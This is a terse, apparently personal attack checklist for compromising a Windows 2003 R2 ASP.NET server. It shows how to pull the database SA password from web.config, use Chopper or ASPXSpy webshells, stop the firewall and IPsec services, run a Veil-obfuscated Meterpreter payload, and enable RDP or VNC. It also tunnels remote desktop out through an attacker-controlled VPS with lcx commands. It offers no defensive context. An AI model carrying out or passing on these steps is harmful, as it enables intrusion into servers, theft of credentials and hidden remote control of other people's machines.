windows 2003 r2 aspx
1 minute read
1>search web.config———> to find sa and sa password
2>choppper(or aspxspy)to connect db,get sa privilege
sometimes strong webshell (like aspxspy.aspx) cannot get system privilege with sa and pass,try:
1.use sa execute cmd in chopper
or
2.restart the system and try strong webshell like aspxspy.aspx
3>net stop sharedaccess
4>net stop policyagent
5>use sa pri run meterpreter(use veil to jail) payload
6>use meterpreter shell to open vnc or desktop
meterpreter>run vnc
or
meterpreter>background
msf>use post/windows/manage/enable_rdp
7>if 6 fail,use sa privileges(in chopper)to run:
victim:lcx -slave vps_ip vps_port victim_ip 3389
vps:lcx -listen vps_port 1234
vps:mstsc /console /v:127.0.0.1:1234
Notice:normally,mstsc---->127.0.0.1:1234 is ok,sometimes exists connect num restrict,use it.in win7: need runas admin,and use:mstsc /console /v:127.0.0.1:1234 -admin